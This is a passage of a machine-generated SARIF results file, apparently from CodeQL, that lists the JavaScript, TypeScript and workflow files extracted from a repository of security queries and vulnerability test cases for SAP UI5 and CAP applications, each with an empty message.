criptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/jest.config.js","uriBaseId":"%SRCROOT%","index":34}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module-imported/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":337}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js","uriBaseId":"%SRCROOT%","index":138}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/index.js","uriBaseId":"%SRCROOT%","index":349}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":270}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js","uriBaseId":"%SRCROOT%","index":420}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":120}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/privileged-user.js","uriBaseId":"%SRCROOT%","index":152}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-notifications/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":347}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service3.js","uriBaseId":"%SRCROOT%","index":116}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service1.js","uriBaseId":"%SRCROOT%","index":153}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":280}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":365}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":452}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/server.js","uriBaseId":"%SRCROOT%","index":125}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js","uriBaseId":"%SRCROOT%","index":204}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-js-object/webapp/index.js","uriBaseId":"%SRCROOT%","index":323}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":585}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/lib/BindingStringParser/test.js","uriBaseId":"%SRCROOT%","index":243}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js","uriBaseId":"%SRCROOT%","index":417}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js","uriBaseId":"%SRCROOT%","index":419}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":464}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js","uriBaseId":"%SRCROOT%","index":193}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":393}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":575}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.js","uriBaseId":"%SRCROOT%","index":186}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":383}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":426}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/dist/cds-extractor.bundle.js","uriBaseId":"%SRCROOT%","index":31}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js","uriBaseId":"%SRCROOT%","index":406}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js","uriBaseId":"%SRCROOT%","index":134}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js","uriBaseId":"%SRCROOT%","index":412}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js","uriBaseId":"%SRCROOT%","index":402}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz-cds-serve/srv/service2.js","uriBaseId":"%SRCROOT%","index":130}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":304}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js","uriBaseId":"%SRCROOT%","index":142}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/cds-extractor-dist-bundle.yml","uriBaseId":"%SRCROOT%","index":21}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/codeql-ql.yml","uriBaseId":"%SRCROOT%","index":23}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/run-codeql-unit-tests-javascript.yml","uriBaseId":"%SRCROOT%","index":24}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/update-codeql.yml","uriBaseId":"%SRCROOT%","index":25}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":".github/workflows/code_scanning.yml","uriBaseId":"%SRCROOT%","index":22}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/actions","index":1},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/projectInstaller.ts","uriBaseId":"%SRCROOT%","index":61}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/files-to-compile.test.ts","uriBaseId":"%SRCROOT%","index":76}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/graph.ts","uriBaseId":"%SRCROOT%","index":39}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/projectInstaller.test.ts","uriBaseId":"%SRCROOT%","index":91}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/compile.test.ts","uriBaseId":"%SRCROOT%","index":68}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/cds-extractor.test.ts","uriBaseId":"%SRCROOT%","index":65}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/graph.ts","uriBaseId":"%SRCROOT%","index":47}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/project.ts","uriBaseId":"%SRCROOT%","index":41}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/cds-extractor.ts","uriBaseId":"%SRCROOT%","index":30}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/index.ts","uriBaseId":"%SRCROOT%","index":56}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/command.ts","uriBaseId":"%SRCROOT%","index":37}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/diagnostics.ts","uriBaseId":"%SRCROOT%","index":52}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/index.test.ts","uriBaseId":"%SRCROOT%","index":70}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/statusReport.ts","uriBaseId":"%SRCROOT%","index":57}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/App.tsx","uriBaseId":"%SRCROOT%","index":594}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/cacheInstaller.test.ts","uriBaseId":"%SRCROOT%","index":88}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/validator.ts","uriBaseId":"%SRCROOT%","index":44}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/types.test.ts","uriBaseId":"%SRCROOT%","index":89}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/statusReport.test.ts","uriBaseId":"%SRCROOT%","index":87}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/packageManager/index.test.ts","uriBaseId":"%SRCROOT%","index":90}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/types.ts","uriBaseId":"%SRCROOT%","index":58}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5-webcomponents/test/queries/xss-input-dangerouslySetInnerHTML/src/index.tsx","uriBaseId":"%SRCROOT%","index":595}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/codeql.ts","uriBaseId":"%SRCROOT%","index":50}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/index.ts","uriBaseId":"%SRCROOT%","index":60}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/version.test.ts","uriBaseId":"%SRCROOT%","index":74}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/logging/cdsExtractorLog.ts","uriBaseId":"%SRCROOT%","index":55}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/command.test.ts","uriBaseId":"%SRCROOT%","index":67}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/constants.ts","uriBaseId":"%SRCROOT%","index":51}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/performanceTrackingIntegration.test.ts","uriBaseId":"%SRCROOT%","index":86}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/packageManager/types.ts","uriBaseId":"%SRCROOT%","index":62}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/validator.test.ts","uriBaseId":"%SRCROOT%","index":73}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/monorepo-support.test.ts","uriBaseId":"%SRCROOT%","index":77}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/build-graph.test.ts","uriBaseId":"%SRCROOT%","index":75}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/utils.ts","uriBaseId":"%SRCROOT%","index":64}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/types.ts","uriBaseId":"%SRCROOT%","index":49}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/compile.ts","uriBaseId":"%SRCROOT%","index":38}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/project-aware-compilation.test.ts","uriBaseId":"%SRCROOT%","index":78}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/parser/index.ts","uriBaseId":"%SRCROOT%","index":48}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/parser/subdirectory-detection.test.ts","uriBaseId":"%SRCROOT%","index":80}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/retry.test.ts","uriBaseId":"%SRCROOT%","index":72}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/jest.setup.ts","uriBaseId":"%SRCROOT%","index":66}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/logging/cdsExtractorLog.test.ts","uriBaseId":"%SRCROOT%","index":85}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/diagnostics.test.ts","uriBaseId":"%SRCROOT%","index":82}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/retry.ts","uriBaseId":"%SRCROOT%","index":42}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/utils.test.ts","uriBaseId":"%SRCROOT%","index":94}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/types.ts","uriBaseId":"%SRCROOT%","index":43}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/src/cds/compiler/index.ts","uriBaseId":"%SRCROOT%","index":40}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/typescript","index":2},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/test/src/cds/compiler/project.test.ts","uriBaseId":"%SRCROOT%","index":71}}}],"message":{"text":""},"level":"none","descriptor":{"i